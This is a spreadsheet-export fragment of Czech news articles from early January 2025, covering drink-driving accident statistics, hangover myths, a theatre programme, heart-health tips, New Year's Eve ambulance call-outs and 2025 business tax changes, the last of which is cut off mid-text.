    <t>Opilé nehody. Pojišťovny spočítaly, kde se nejvíc bourá, hříšníkům zdraží Vánoční svátky jdou často ruku v ruce s návštěvami, ale i alkoholem . Pokud se ovšem na silnice vydá opilý řidič, riskuje zdraví, život i vysoké pokuty. Nejčastěji takové řidiče potkáte v pásu od Plzeňska přes jih Čech na jižní Moravu . Na nový bodový systém a spolu s ním i v řadě případů přísnější pokuty už si většina řidičů asi zvykla. Přesto připomínáme, že jízda pod vlivem alkoholu automaticky znamená pokutu od 7 000 Kč do 25 000 Kč, nad 0,3 promile také šest trestných bodů a ztrátu řidičáku na šest až 18 měsíců. Připomínáme také, že pokud jako opilý řidič způsobíte nehodu, pojišťovna poškozeným vše uhradí, následně však vše bude po vás vymáhat. A i jako opilý poškozený můžete mít s pojišťovnou problém v podobě minimálně krácení plnění. Opilých nehod je pořád hodně „V letech 2022 až 2024 došlo celkem ke 279 301 nehodám, které byly řešeny policí. Z tohoto počtu za 14 355 nehodami (5,14 % z celkového počtu) stál alkohol . Tyto nehody pod vlivem alkoholu bohužel dále způsobily 5 588 lehkých zranění, 396 těžkých zranění a u 39 dopravních nehod zaviněných vlivem alkoholu došlo bohužel také k úmrtí účastníka dopravní nehody,“ uvádí Petr Jedlička, pojistný matematik ČKP. Nejvíce rizikové okresy za roky 2022 až 2024 Břeclav : z celkového počtu 1 461 nehod vzniklo 196 pod vlivem alkoholu (13,4 %), stabilní nejhorší výsledek stejně jako v roce 2023 i v roce 2022 Klatovy : z celkového počtu 1 594 nehod vzniklo 159 pod vlivem alkoholu (10,0 %), posun ze 7. nejhoršího pořadí ve srovnání s rokem 2023. Plzeň -sever: z celkového počtu 1 664 nehod vzniklo 163 pod vlivem alkoholu (9,8 %), posun ze 4. místa v roce 2023. Znojmo : z celkového počtu 1 389 nehod vzniklo 136 pod vlivem alkoholu (9,8 %), posun ze 2. nejhoršího pořadí v roce 2023. Hodonín : z celkového počtu 1 885 nehod vzniklo 178 pod vlivem alkoholu (9,4 %), posun ze 3. nejhoršího pořadí v roce 2023. Blansko : z celkového počtu 1 399 nehod vzniklo 132 pod vlivem alkoholu (9,4 %), posun z 10. místa v roce 2023. Jindřichův Hradec : z celkového počtu 1 457 nehod vzniklo 134 pod vlivem alkoholu (9,2 %), posun z 5. místa v roce 2023. Tachov : z celkového počtu 1 386 nehod vzniklo 122 pod vlivem alkoholu (8,8 %), stabilní pořadí ve srovnání s rokem 2023 Český Krumlov : z celkového počtu 1 446 nehod vzniklo 122 pod vlivem alkoholu (8,4 %), stabilní pořadí ve srovnání s rokem 2023 České Budějovice : z celkového počtu 4 275 nehod vzniklo 351 pod vlivem alkoholu (8,2 %), posun ze 12. místa v roce 2023. U všech dopravních nehod vychází, že přibližně každá pátá nehoda šetřená policí (21 % ze všech nehod) končí zraněním nebo úmrtím účastníka dopravní nehody. U nehod s alkoholem je riziko zranění a úmrtí proti ostatním nehodám cca dvojnásobné, když 42 % nehod pod vlivem alkoholu zahrnuje zranění nebo úmrtí. „Podíl nehod pod vlivem alkoholu za samotný rok 2024 dosahuje úrovně 5,1 %, což představuje nižší hodnotu proti roku 2022 s 5,4% podílem, ale vůči úrovni roku 2023 s 4,9% podílem nehod pod vlivem alkoholu došlo naopak k dílčímu nárůstu,“ upřesňuje statistiky Petr Jedlička. Z policejních statistik vyplývá, že mezi nejrizikovější oblasti s nejvyšším výskytem nehod pod vlivem alkoholu patří tradičně oblast jihozápadní Moravy a západu Čech , zejména Plzeňska . Nejhůře je na tom Břeclav , kde je každá osmá vzniklá nehoda pod vlivem alkoholu . „Enormní rizikovost vychází také v okrese Klatovy , Plzeň – sever, Znojmo , Hodonín , Blansko a Jindřichův Hradec , kde podíl nehod pod vlivem alkoholu dosahuje vždy nejméně 9 % všech šetřených nehod. Za alarmující fakt lze prohlásit, že vysoká rizikovost těchto okresů většinou vycházela i v předchozích srovnání ČKP komunikovaných o Vánoci v předchozích letech,“ upozornili specialisté z ČKP. Alkohol nemají rády ani pojišťovny Michal Kárný z pojišťovny Direct upozorňuje, že vyhnout se trestu za alkohol za volantem nejde ani v případě policie, ale ani pojišťovny. „Řidičům nepomůže ani to, že policistům zkoušku na alkohol nebo drogy odmítnou. Odmítnutí totiž pro pojišťovnu automaticky znamená to stejné, jako by se u nich alkohol nebo drogy potvrdily. Kromě alkoholu a drog si dejte pozor také na některé léky. Stejná pravidla totiž platí i pro prášky, které jsou označené zákazem řídit motorové vozidlo,“ vysvětlil. Odmítnutí podrobení se testu na alkohol a jiné návykové látky tak opravdu v konečném důsledku vyjde velmi draho. Jde o přestupek, který není možné řešit na místě. Ve správním řízení se pak pokuta dostává na 25 000 Kč až 75 000 Kč, přidáváno je šest trestných bodů a také zákaz řízení na 18 až 36 měsíců. A pozor, pojišťovny řízení pod vlivem alkoholu nebo drog trestají i do budoucna a za pojištění si hříšníci příště výrazně připlatí. „V Directu se takovýto klient posune o deset stupňů níž na bonusové stupnici. Pokud měl maximální bonus, tak se dostane na nulu. Pokud neměl, dostává se do malusu. To znamená, že si za pojištění připlatí ještě víc,“ vysvětluje tisková mluvčí pojišťovny Nela Maťašeje. Toto pravidlo ale neplatí u všech pojišťoven, protože podmínky pro bonus a malus si každá nastavuje individuálně. Pohoršili si Okresy s nejvýraznějším posunem v pořadí rizika nehody alkoholu směrem nahoru mezi roky 2022 a 2024 Litoměřice : z 65. nejrizikovějšího (tj. 12. nejméně rizikového) pořadí v roce 2022 posun na 37. nejrizikovější pořadí Mělník : z 61. nejrizikovějšího místa (tj. 16. nejméně rizikového) posun na 42. nejrizikovější pořadí Rychnov nad Kněžnou : z 52. nejrizikovějšího místa posun na 33. nejrizikovější pořadí Autor: Anna Russová Autor person Anna Russová Rubrika transition_slide Auto - Zpravodajství</t>
  </si>
  <si>
    <t>20250101_436_3692509025_5a059a99b56d34e346b1.html</t>
  </si>
  <si>
    <t>5a059a99b56d34e346b1</t>
  </si>
  <si>
    <t>Receptury na kocovinu bývají pověry. Jeden však funguje, říká studie Alkohol pomůže. Ale jen na moment Vytlouct nepříjemné následky konzumace alkoholu jeho další dávkou řešení nepřinese, překvapení se nekoná. I za touto pověrou je přitom něco svůdného. Jakkoli jsme totiž druhý den po hýření zbití, unavení, mozek je hyperstimulovaný. „Když alkohol vyprchá, je mozek v hypervzrušeném stavu,“ líčí pro server CNN Robert Swift , profesor psychiatrie a lidského chování. „Podíváte-li se do mozku osoby v kocovině, najdete ho v nabuzeném, předrážděném stavu, i když se dotyčný nebo dotyčná cítí znaveně,“ popsal. Když si v onom stavu dopřejeme další alkohol , mozek to znormalizuje, protože se mu dostane sedativa. Není to však řešení, protože absentuje budoucnost. „Cítíte se lépe, než alkohol zase vyprchá a celý cyklus se opakuje,“ uzavírá Swift. Dobrým nápadem není ani pokoušet se z kocoviny dostat s pomocí mastného jídla. „Mastné pokrmy jsou obtížnější na trávení, takže je lepší se jim vyhýbat,“ konstatuje očividný poznatek Swift. Doplňuje, že ona pověra nedává příliš smysl už jen proto, že alkohol , který pijeme, etanol, je rozpouštědlem. „S tukem ve vašem žaludku nakládá stejně jako zbavuje mastnoty součástky v autě,“ poznamenává. Autor: Tomáš Bratříček Autor person Tomáš Bratříček</t>
  </si>
  <si>
    <t>20250101_437_3692508683_574e44da38fd551487ff.html</t>
  </si>
  <si>
    <t>574e44da38fd551487ff</t>
  </si>
  <si>
    <t>KULTURA</t>
  </si>
  <si>
    <t>KULTURA Rychnov nad Kněžnou ZVEME VÁS NEJEN DO PELCLOVA DIVADLA TORBEN BETTS | SPOLEK KAŠPAR DIVADLO V CELETNÉ VINCENC Hrají Jan Zadražil , Jitka Nerudová , Eva Elsnerová , Petr Halíček Režie Pavel Lagner Dvouhodinová jízda na emoční centrifuze, během níž spolu sdílíte slzy smíchu i regulérního dojetí. Velkoměstští intelektuálové Emily a Oliver se přestěhují z Londýna do levnějšího domu na severu Anglie , aby měli blíž ke „skutečným lidem“. Ty ve hře zastupují jejich sousedé, manželé Alan a Dawn, kteří však namísto diskuzím o politice a umění dávají přednost fotbalu a popíjení plechovkového piva . Tento střet dvou odlišných kultur nezůstane bez následků a poznamená všechny zúčastněné. Toužíte-li dosyta lidsky pookřát, radíme rozhodně tento divácký zážitek neminout. PONDĚLÍ 20.1. 19.00 PELCLOVO DIAVDLO RADŮZA Její umělecká dráha připomíná některé „pohádkové" životopisy. Na ulici ji v roce 1993 objevila Zuzana Navarová a již tři dny na to zpívala ve svatyni českých zpěváků, v pražské Lucerně. O pár týdnů později zde pak triumfovala jako „předskokanka" slavné americké písničkářky Susanne Vega, o šest let později měla stejnou čest při koncertě Mikea Old 昀 elda. Od té doby vydala řadu velmi úspěšných sólových alb, která bez jakékoliv reklamy lámou rekordy v prodejnosti, získala několik zlatých Andělů a bodovala také v anketě Zlatý slavík. Díky své jedinečnosti a originálním písním, čerpajících především z české tradice, zaujala i publikum v zahraničí, například Polsku a ve Francii . Radůza se zvládne doprovodit na několik hudebních nástrojů, její zpěv hřmí, ale i jemně vypráví dojemné příběhy. V říjnu 2023 v roce svého kulatého životního jubilea se rozhodla bilancovat a vydává dvojalbum nazvané Bylo nebylo, které obsahuje výběr nejúspěšnějších písní, jež složila v průběhu dosavadních třiceti let své hudební dráhy. Tentokrát nám představí za doprovodu Josefa Štěpánka (kytary) a Miloše Dvořáčka (bicí) průřez dosavadní tvorbou. STŘEDA 29.1. 19.00 SPOL. CENTRUM DIVADLA | ÚNOR–KVĚTEN STEFAN VÖGEL | KOMORNÍ DIVADLO KALICH PRAHA OKO TYGRA Hraje Marek Němec Režie Jakub Nvota Komedie jednoho herce o krizi středního věku. INGMAR BERGMAN | AGENTURA HARLEKÝN PRAHA SCÉNY Z MANŽELSKÉHO ŽIVOTA Hrají Michal Dlouhý , Míša Badinková, Kamil Halbich / Vasil Fridrich , Barbara Lukešová / Lenka Zbranková Režie Vladimír Strnisko Drama. Milostné vztahy procházejí nejrůznějšími fázemi. MICHAELA DOLEŽELOVÁ, ROMAN VENCL | SPOLUHRA PRAHA KRÁLOVNY Hrají Jana Boušková / Martina Hudečková , Vilma Cibulková , Karolína Půčková Režie Petr Svojtka Komedie plná upřímného humoru, ze kterého občas mrazí v zádech. PETER QUILTER | DIVADLO UNGELT PRAHA VEJŠLAP Hrají Jan Holík , Petr Stach , Martin Písařík Režie Pavel Ondruch Tři stárnoucí kamarádi na úpatí hory a dvoudenní túra před nimi. Cíl je jasný: překonat krizi středního věku… STŘEDA 19.2. 19.00 PONDĚLÍ 24.3. 19.00 STŘEDA 23.4. 19.00 ÚTERÝ 27.5. 19.00 Online předprodej na kulturark.cz Více informací 604 565 372 | 494 535 329</t>
  </si>
  <si>
    <t>20250101_438_3692508336_341469b04c58d982e148.html</t>
  </si>
  <si>
    <t>341469b04c58d982e148</t>
  </si>
  <si>
    <t>Receptury na kocovinu bývají pověry. Jeden však funguje, říká studie Ani olej, ani pořadí Olivový olej je bezpochyby zdravý. Jenže před kocovinou vás neochrání. Neuspěl například olivový olej. I za touto radou přitom stálo vysvětlení, které se honosí jistou působivostí. Konzumace olivového oleje před popíjením má totiž v žaludku vytvořit obal, který následně stojí v cestě vstřebávání alkoholu do krevního řečiště. A pomalejší absorpce má zmírňovat kocovinu. Olej vstřebávání alkoholu do jisté míry opravdu zpomaluje, přiznává odborník na biomedicínu Justin Stebbing v článku pro server The Conversation . Jenže dodává, že v žaludku se vstřebává jen asi dvacet procent alkoholu , zbytek až posléze v trávicím procesu, a to už olejová záklopka neovlivní. Kromě toho Stebbing doplňuje, že kocovinové symptomy způsobuje tělesný metabolismus, a na něj nemá konzumace oleje žádný vliv, kocovinu jako následek pití tedy nijak neumenšuje. Ke dnu pak věda poslala i oblíbené lidové pověry, které slibují popíjení bez kocoviny díky dodržení té či oné posloupnosti při konzumaci. Studie z magazínu American Journal Of Slinical Nutrition prověřila speciálně tu, která předepisuje, že pivo je třeba pít před vínem , ne obráceně, protože opačný „jízdní řád“ prý trestá provinění horší kocovinou. Německý autorský tým pro důkladné šetření angažoval devadesát mužů a žen ve věku od devatenácti do čtyřiceti let. Jedna část měla pít nejprve pivo , dokud koncentrace alkoholu v dechu nedosáhla 0,05 procenta, poté přešla na víno , aby se dostala na 0,11 procenta. Druhá skupina si alkohol dopřávala v opačném gardu. Třetí skupina pila buď jen pivo , nebo jen víno . Druhý den měli účastníci a účastnice ohodnotit intenzitu svých kocovinových symptomů. Po týdnu se chopili skleniček znovu, ale prohodili si pořadí nebo alkohol . Ti, kdo začínali pivem , odstartovali konzumací vína , a naopak ti, co pili pivo , sáhli po vínu. A opět měli zhodnotit sílu příznaků kocoviny. Závěr týmu Kaie O. Hensela z univerzitní nemocnice v německém Wuppertalu byl jasný: pořadí konzumace alkoholu nemá na kocovinu žádný jednotný dopad, shrnuje list The New York Times . V souboji s vědou neobstálo ani oblíbené vyprošťovací pivo . Autor: Tomáš Bratříček Autor person Tomáš Bratříček</t>
  </si>
  <si>
    <t>20250101_439_3692508333_07eddd9626aede57e2fa.html</t>
  </si>
  <si>
    <t>07eddd9626aede57e2fa</t>
  </si>
  <si>
    <t>Do nového roku se srdcem jedna báseň</t>
  </si>
  <si>
    <t>Do nového roku se srdcem jedna báseň Omezte zlozvyky a začněte o své srdce pečovat tak, jak si zaslouží. Nejčastější příčinou úmrtí ve vyspělých zemích není obávaná rakovina, ale onemocnění srdce a cév. Proto bychom měli o jejich zdraví pečovat. Není to nijak složité a zvládne to úplně každý! Za současnou „epidemií“ kardiovaskulárních onemocnění může do značné míry způsob stravování. Příliš mnoho tuku, soli a cukru naši oběhovou soustavu ničí. Problém je, že většina z nás ani neví, kolik tuku nebo cukru konzumuje. Kupujeme hotové pečivo, sladkosti, uzeniny a instantní jídla, aniž bychom kontrolovali, kolik čeho obsahují. Pokud si chcete dopřát to nejlepší, omezte nákup hotových jídel a polotovarů na minimum a začněte vařit. Používejte co nejvíc zeleniny a ovoce, místo tučného masa si dejte rybu nebo maso libové. Odepřete si nezdravé pochutiny, jako jsou sušenky, čokolády, klobásky a salámy. Časté sezení jako zabiják Čím dál víc lidí vykonává svou práci vsedě. A nedostatek pohybu vede k tomu, že se oběhová soustava oslabuje. K tomu, aby se její kondice zlepšila, nemusíte trávit každou volnou chvilku v posilovně. Úplně stačí, když každý den zařadíte do programu svižnou půlhodinovou procházku. Pohybem snížíte hladinu zlého cholesterolu v krvi, snížíte riziko cukrovky a přispějete k optimalizaci krevního tlaku. Chcete-li pro sebe udělat víc, začněte chodit plavat. Pro jedince se zdravým srdcem je skvělá i návštěva sauny. Jestliže vaše srdce a cévy nejsou úplně fit, musíte vhodnost saunování nejprve konzultovat s lékařem. Zbavte se závislostí a vyvarujte se stresu Cigarety, alkohol a psychická zátěž ničí naše zdraví. Pokud jde o kouření, s tím byste měla skoncovat úplně. Jestli je pro vás nepředstavitelné, že byste měla zůstat bez nikotinu, přejděte alespoň na elektronickou cigaretu. Z alkoholu se vyvarujte lihovin, občas si ale můžete dát malé pivo . Sklenka vína denně je také povolena, obzvlášť v případě červeného, které srdci dokonce prospívá. Zbavit se stresu není lehké. Hodně z nás je pod tlakem kvůli práci a to se nedá jen tak lehce změnit. Proto je důležité najít si něco, co vás od starostí odvede. Najděte si koníčka, který vás baví, a jednou týdně zkuste nějaké relaxační cvičení, třeba jógu nebo taiči. Pomoc najdete také v přírodě Pomoc pro silné srdce a cévy nabízí i příroda. Při vaření používejte k ochucení jídel česnek, chilli, kurkumu, skořici a oregano. Z bylinek využijte třeba hloh nebo srdečník. Hloh zlepšuje okysličení organismu a přispívá k neutralizaci volných radikálů. Kupte si hlohovou tinkturu a užívejte třikrát denně deset až patnáct kapek. Ze srdečníku, který snižuje tepovou frekvenci a tlak, si můžete připravit čaj. Jednu lžičku sušené byliny zalijte šálkem vroucí vody a nechte deset minut louhovat. Pozor, lidé, u kterých již bylo diagnostikováno srdeční onemocnění, by se měli poradit s lékařem. Rozdělte si při jídle talíř Už jste někdy slyšela o užitečné pomůcce, které se říká zdravý talíř? Jde o to, že při každém jídle by měl váš talíř obsahovat čtyři části. Čtvrtinu by měla představovat zelenina. Měla byste do jídelníčku zařadit hodně rozmanitých druhů. Druhá čtvrtina by měla patřit ovoci. Další část je určena kvalitním bílkovinám, tedy luštěninám, vejcím, chybět by neměla ani zdravá semínka a ořechy. A poslední část bude patřit příloze. Vyhnout byste se ale měla té, která obsahuje bílou mouku. Klidně zkuste jáhly, ovesné vločky, přílohou může být i domácí kváskový chléb. Jsou malá, ale šikovná... Dobré trávení, čistou pleť, lepší imunitu nebo zdravější cévy? To všechno můžete mít, když budete pravidelně konzumovat lněné semínko. Oléčivých účincích lněných semínek věděli již staří Řekové. Odpradávna byla prostředkem proti zácpě, při problémech s klouby a šlachami a také k usnadnění porodu. Semena lnu obsahují asi 30 % tuku, ve kterém se nacházejí nenasycené omega-3 mastné kyseliny, které snižují „zlý“ cholesterol. Mají vysoký obsah vitaminů a minerálů. Nacházejí se v nich také fytoestrogeny, látky podobné ženským hormonům. S čím si poradí? Díky vysokému obsahu vlákniny a slizu usnadňuje drcené semínko pohyb potravy ve střevech a ulehčuje vyprazdňovaní. Protože má protiplísňové a antibakteriální účinky, je vhodné při léčbě žaludečních obtíží a průjmových onemocnění. Užívání lněného semínka se doporučuje také při opakovaných infekcích dýchacích cest, astmatu a revmatických potížích. Pacientům s cukrovkou pomáhá stabilizovat hladinu krevního cukru. Zmírňuje návaly horka u žen v období menopauzy a prospívá i srdci.</t>
  </si>
  <si>
    <t>20250101_44_3699124214_f71903a9acb3ec36c71c.html</t>
  </si>
  <si>
    <t>f71903a9acb3ec36c71c</t>
  </si>
  <si>
    <t>Záchranáři o Silvestru: Rušná noc plná úrazů, alkoholu a pyrotechniky Publikováno Od Rudolf Plíhal Letošní oslavy příchodu roku 2025 přinesly záchranářům rušnou noc plnou výjezdů. První zásah roku přišel pouhých deset minut po půlnoci a odstartoval náročnou směnu, která byla výrazně rušnější než ta loňská. „První výjezd nového roku patřil posádce v Uničove . Vyjížděli k muži středního věku, který při manipulaci s pyrotechnikou utrpěl poranění oka. Po prvotním ošetření byl převezen na oční kliniku FN Olomouc,“ popsala mluvčí zdravotnické záchranné služby Lucie Mikisková s tím, že v nočních hodinách patřily mezi nejvytíženější výjezdové skupiny posádky ze základny Přerov , které zasahovaly u nejvyššího počtu událostí spojených s oslavami. Počet výjezdů na denní směně: 136 Počet výjezdů na noční směně: 86 Nejčastější zásahy Úrazy spojené s pyrotechnikou (4 případy): Před 20. hodinou došlo v Olomouci k amputaci prstů na horní končetině u muže středního věku. Po půlnoci záchranáři zasahovali u dvou poranění oka a jednoho úrazu horní končetiny způsobených odpalováním pyrotechniky. Napadení (12 případů): Ve spolupráci s policií záchranáři zasahovali u 12 případů napadení, často pod vlivem alkoholu . Řezná poranění (4 případy): Řezná zranění byla dalším častým důvodem k výjezdům. Intoxikace alkoholem (1 případ): Záchranáři byli příjemně překvapeni nízkým počtem zásahů kvůli přímé intoxikaci alkoholem . Pozor Aktualita: Do projektu s vouchery se v Jeseníkách zapojilo již přes 180 ubytovatelů Úrazy v opilosti (10 případů): Naopak počet úrazů způsobených pády a dalšími nehodami pod vlivem alkoholu oproti loňskému roku vzrostl. ZDROJ ZDE ✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy Doporučujeme: Autor: Rudolf Plíhal Autor person Rudolf Plíhal</t>
  </si>
  <si>
    <t>20250101_440_3693934312_7994ec3d127ad59fabf1.html</t>
  </si>
  <si>
    <t>7994ec3d127ad59fabf1</t>
  </si>
  <si>
    <t>Velký rozcestník změn v&amp;nbsp;roce 2025, které se týkají podnikatelů</t>
  </si>
  <si>
    <t>Velký rozcestník změn v&amp;nbsp;roce 2025, které se týkají podnikatelů Server Podnikatel.cz opět připravil velký přehled změn, které se v roce 2025 týkají či dotknou podnikatelů. Změny se týkají jak OSVČ, firem, tak zaměstnanců. Kromě „tradičních změn“ pojistného a paušální daně pro OSVČ či minimální mzdy došlo k celé řadě dalších novinek. Co se dozvíte v článku Zvýšení záloh na sociálním a zdravotním pojištění OSVČ Zvýšení paušální daně OSVČ OSVČ musí s ČSSZ komunikovat elektronicky OSVČ získaly nárok na ošetřovné Pracující a OSVČ důchodci mají nižší sociální pojištění Další změny u sociálního pojištění OSVČ Elektronizace dávek nemocenského pojištění Zaměstnavatele lze delegovat k jakékoli ČSSZ Zastropování zaměstnaneckých benefitů se zvýšilo Úprava zaměstnaneckých akcií Zvýšení limitu pro pojistné u dohody o provedení práce Rozvrhování práce zaměstnancem Změny u koeficientů daně z nemovitých věcí Změna počítání limitu pro registraci k DPH Zvýšení daně z lihu Zvýšení daně z tabákových výrobků a zahřívaného tabáku a zavedení daně z alternativních výrobků Vracení spotřební daně u tzv. zelené nafty Snížená sazba spotřební daně pro malé nezávislé pivovary Úprava zdaňovacího období pro malé plátce daně z elektřiny Nová podmínka pro obchodování s cennými papíry a podíly v obchodní korporaci Zvýšení minimální mzdy a zavedení valorizačního mechanismu Tuzemské a zahraniční cestovní náhrady Změna paušálních náhrad na home office Změna výpočtu náhradního plnění Kdo zaměstnává: Zvýšení náhrady mzdy Měrné ceny i u nepotravinářského zboží Důchodová reforma Zvýšení záloh na sociálním a zdravotním pojištění OSVČ OSVČ se v roce 2025 zvýšily minimální zálohy sociálního pojištění. Loňský konsolidační balíček totiž zvyšuje minimální vyměřovací základ pojistného na sociální pojištění OSVČ z 25 % v roce 2023 až na 40 % průměrné mzdy v roce 2026, tj. o 5 procentních bodů ročně. Zároveň se OSVČ zvýšil vyměřovací základ u sociálního pojištění z 50 na 55 % základu daně. Tradičně se navíc zvýšila průměrná mzda a stejně tak i minimální zálohy. Pro rok 2025 to znamená dohromady zvýšení minimální zálohy sociálního pojištění z 3852 Kč na 4759 Kč u OSVČ hlavních a ze stávajících 1413 Kč na 1496 Kč u OSVČ vedlejších. Výjimku nicméně i nadále mají začínající OSVČ hlavní, pro které je minimální vyměřovací základ v prvních dvou letech podnikání stanoven na úrovni 25 % průměrné mzdy. Pro ně budou v roce 2025 platit minimální zálohy ve výši 3399 Kč. S novým vyměřovacím základem se mění i výše záloh na zdravotní pojištění. Minimální záloha na zdravotní pojištění se tak pro rok 2025 zvýší z 2968 Kč na 3143 Kč. Přečtěte si také: Jak se mají OSVČ změnit zálohy na sociální a zdravotní pojištění v roce 2025? Zvýšení paušální daně OSVČ Růst minimálních záloh má dopad i do systému paušální daně OSVČ. V roce 2025 činí paušální daň v prvním pásmu 8716 Kč měsíčně (5473 Kč sociální pojištění, 3143 Kč zdravotní pojištění a 100 Kč daň z příjmů). V druhém pásmu OSVČ i nadále hradí 16 745 a ve třetím 27 139 Kč. Přečtěte si také: Paušální daň OSVČ vzroste pro rok 2025 jen v prvním pásmu, a to na 8716 Kč OSVČ musí s ČSSZ komunikovat elektronicky OSVČ, které mají zpřístupněnou datovou schránku ze zákona, musí ode dneška činit vybraná podání pouze elektronicky i v oblasti sociálního a nemocenského pojištění OSVČ. U nemocenského pojištění se jedná o přihlášku k dobrovolnému nemocenskému pojištění OSVČ a o podání žádosti o dávky nemocenského pojištění, tedy o peněžitou pomoc v mateřství, o dlouhodobé ošetřovné a o otcovskou. U sociálního pojištění je nutné podat elektronicky oznámení o zahájení samostatné výdělečné činnosti, přihlášku k účasti na důchodovém pojištění a přehled o příjmech a výdajích za uplynulý kalendářní rok a o pojistném placeném OSVČ. Přečtěte si také: Nejen berňák, OSVČ budou muset elektronicky komunikovat i se sociálkou OSVČ získaly nárok na ošetřovné Rozšiřuje se počet pojištěnců, kteří budou mít nárok na ošetřovné. Nově tak o něj mohou žádat i OSVČ. Podmínkou je dobrovolná účast na nemocenském pojištění. Pro OSVČ nově platí stejná úprava, která dosud platila jen pro zaměstnance a týká se podmínek nároku na ošetřovné, podpůrčí doby a výše ošetřovného. Přečtěte si také: OSVČ a lidé pracující na dohody získají nárok na ošetřovné Pracující a OSVČ důchodci mají nižší sociální pojištění Součástí důchodové reformy je i nahrazení trvalého zvyšování důchodů snížením sazby pojistného o 6,5 p. b. pro všechny starobní důchodce s výdělečnou činností. Snížení pojistného se tak týká jak zaměstnaných seniorů, tak důchodců OSVČ. Poprvé bude možné uplatnit slevu za měsíc leden 2025, tj. při splatnosti pojistného za tento měsíc do 20. února 2025. Přečtěte si také: Jak uplatní pracující důchodci u zaměstnavatele slevu na pojistném? Další změny u sociálního pojištění OSVČ U sociálního pojištění OSVČ nastaly i další změny. Vzhledem k tomu, že v současnosti je skoro všem žádostem o snížení zálohy vyhověno pro splnění podmínek, nově se podává jen oznámení o snížení záloh nebo jejich neplacení místo žádosti. OSVČ dále nově nemohou po podání přehledu za kalendářní rok měnit nebo rušit datum oznámení o zahájení nebo ukončení činnosti, o zániku oprávnění vykonávat činnost nebo o pozastavení činnosti a ani dodatečně oznamovat skončení důvodů pro vykonávání vedlejší samostatné výdělečné činnosti, pokud vznik nebo trvání těchto důvodů oznámily v průběhu kalendářního roku, za který přehled podávají. Přečtěte si také: Přehled změn v sociálním pojištění OSVČ v roce 2025 Elektronizace dávek nemocenského pojištění Dávky, které byly ještě postaveny čistě na listinné podobě, už půjde vyřídit jen elektronicky. Papírový tiskopis rozhodnutí o dávce může být vystavován pouze v odůvodněných případech (např. technický výpadek). Lékařům se nezavedly žádné nové povinnosti, změnila se jen forma dokumentu z listinné podoby na elektronickou. To se ostatně týká i dočasné pracovní neschopnosti. Elektronický je i dosavadní průkaz dočasně práce neschopného pojištěnce. Přečtěte si také: Aktuální dotazy a odpovědi k elektronizaci dávek nemocenského pojištění od roku 2025 Zaměstnavatele lze delegovat k jakékoli ČSSZ Zaměstnavatelé mohou být nově delegováni ke kterékoli Územní správě sociálního zabezpečení. Nově vzniklým zaměstnavatelům pak ČSSZ určí, která Územní správa sociálního zabezpečení (ÚSSZ) bude pro ně místně příslušná z hlediska plnění povinností v oblasti nemocenského pojištění. Přečtěte si také: Změny místní příslušnosti zaměstnavatele ke správě sociálního zabezpečení Zastropování zaměstnaneckých benefitů se zvýšilo U benefitů ve formě pořízení zboží nebo služeb zdravotního, léčebného, hygienického a obdobného charakteru od zdravotnických zařízení nebo pořízení zdravotnických prostředků na lékařský předpis nově platí daňové osvobození až do výše průměrné mzdy. Pro rok 2025 jde tedy o 46 557 Kč. U benefitů ve formě použití vzdělávacích nebo rekreačních zařízení, poskytnutí rekreace nebo zájezdu, použití zařízení péče o děti předškolního věku včetně mateřské školy podle školského zákona, knihovny zaměstnavatele nebo tělovýchovných a sportovních zařízení nebo poskytnutí příspěvku na kulturní nebo sportovní akce nebo příspěvku na tištěné knihy, včetně obrázkových knih pro děti, mimo knih, ve kterých reklama přesahuje 50 % plochy, pak zůstane samostatný limit ve výši poloviny průměrné mzdy. Jestliže bude zaměstnavatel poskytovat zaměstnanecké benefity v plném rozsahu, bude u jednoho zaměstnance od daně a tím i od odvodů pojistného osvobozený o nepeněžní příjem v částce 46 557 Kč na zdraví a 23 278 Kč na ostatní benefity. Celkově tedy 69 835 Kč. Přečtěte si také: V roce 2025 vzrostou limity u dohod o provedení práce i u zaměstnaneckých benefitů Úprava zaměstnaneckých akcií Dřívější režim pro zaměstnanecké akcie (tj. odložení zdanění) se aplikuje dobrovolně. Nově je možné se rozhodnout zdanit benefit ze zaměstnaneckých akcií okamžitě (stejně jako do roku 2023) nebo za podmínek, které jsou vyjmenovány v § 6 odst. 14 zákona o daních z příjmů . Zvýšení limitu pro pojistné u dohody o provedení práce Přestože se plánovaná pravidla pro rok 2025 několikrát měnila, nakonec ode dneška došlo jen ke zvýšení limitu pro odvody pojistného ze stávajících 10 tisíc Kč na 25 % průměrné mzdy. Protože průměrná mzda, ze které se limit počítá, činí pro letošní rok 46 557 Kč, hranice pro pojistné je 11 500 Kč. Pozor ovšem ještě na jednu změnu v této oblasti. Zatímco do konce loňského roku se platilo pojistné, pokud byl zaměstnancům zúčtován započitatelný příjem v částce vyšší než 10 000 Kč (čili aspoň 10 001 Kč), nově stačí ve výši aspoň 25 % (11 500 Kč). Částka 11 500 Kč už tak zakládá povinnost platit pojistné. Přečtěte si také: Staronová podoba dohod o provedení práce 2025 Rozvrhování práce zaměstnancem Nově vznikla také možnost rozvržení práce zaměstnancem, a to pro pracovní poměry i dohody. Samorozvrhovat jde i na pracovišti zaměstnavatele. Přečtěte si také: Rozvrhování práce zaměstnancem od roku 2025 Změny u koeficientů daně z nemovitých věcí Konsolidační balíček zavedl také změnu v oblasti koeficientů, která však nabyla účinnosti až od letošního roku. Od roku 2025 skončil koeficient 1,5, přičemž obce ale mají možnost pro podnikatele a další typy staveb, kterých se koeficient 1,5 týkal, zavést speciální místní koeficient. Další novinkou je, že od letošního roku už nelze snížit základní koeficient k dani, půjde jen o jednu kategorii zvýšit. Změn doznal i místní koeficient, který lze nově stanovit 5 způsoby: pro celé území obce, jednotlivé katastrální území, jednotlivý městský obvod nebo městskou část, jednotlivou skupinu nemovitých věcí (např. rekreační budovy) a jednotlivou nemovitou věc. Pokud město stanoví více místních koeficientů, pro každou nemovitost se vždy počítá jen jeden. Přečtěte si také: U daně z nemovitostí dojde v roce 2025 k řadě změn. Které koeficienty končí? Vzhledem ke změnám koeficientů změnila většina okresních měst vyhlášku, přičemž řada z nich toho využila ke změně výše daně. Server Podnikatel.cz sestavil velký přehled, jak se daň v jednotlivých městech mění. Přečtěte si také: 2025: Unikátní přehled, jak okresní města mění koeficienty k dani z nemovitostí Změna počítání limitu pro registraci k DPH Nově se má obrat pro registraci k DPH počítat za kalendářní rok, s čímž souvisí i nové nastavení vzniku plátcovství. Malé podniky, které v průběhu roku překročí obrat 2 mil. Kč, se stanou plátcem DPH až od 1. ledna následujícího kalendářního roku. Avšak v případě, kdy obrat 